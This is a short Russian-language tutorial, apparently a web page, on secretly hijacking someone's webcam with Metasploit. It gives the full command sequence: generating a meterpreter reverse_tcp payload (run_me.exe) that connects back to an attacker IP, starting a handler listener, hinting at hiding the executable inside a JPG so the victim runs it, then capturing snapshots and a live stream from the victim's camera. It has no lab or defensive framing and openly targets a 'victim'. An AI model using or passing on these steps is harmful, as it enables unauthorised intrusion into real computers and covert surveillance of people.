Взлом вебки

Взлом вебки

InfoBiz


 Для начала нам нужно, создать вредоносный исполняемый файл run_me.exe, который в BackTrack создается так, как показано ниже: 

 

Код: 

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe 

LHOST=192.168.1.5 – IP-адрес атакующего 

LPORT=4444 – порт атакующего 

 

Запускаем Metasploit: 

 

Код: 

# msfconsole 

Далее вводим команды: 

 

Код: 

> use exploit/multi/handler 

> set payload windows/meterpreter/reverse_tcp 

> set lhost 192.168.1.5 

> exploit 

Теперь нам нужно, что пользователь запустил файл run_me.exe. Как это добиться уже другая история, как вариант можно засунуть вредоносный файл в другой файл. Чтобы узнать как скрыть/склеить exe-файл в jpg вооружайтесь googl’ом.. 

 

После того, когда жертва запустит файл, мы получим контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но сейчас будем подсматривать за пользователем. 

 

Сначала посмотрим, есть ли вообще у него web-камера? 

 

Код: 

meterpreter > webcam_list 

 1: Logitech Webcam 120 

Если повезло делаем снимок: 

 

Код: 

meterpreter > webcam_snap 

Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой: 

 

Код: 

meterpreter > run webcam -p /var/www 

После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите: 

 

Код: 

/var/www/webcam.html 


Report Page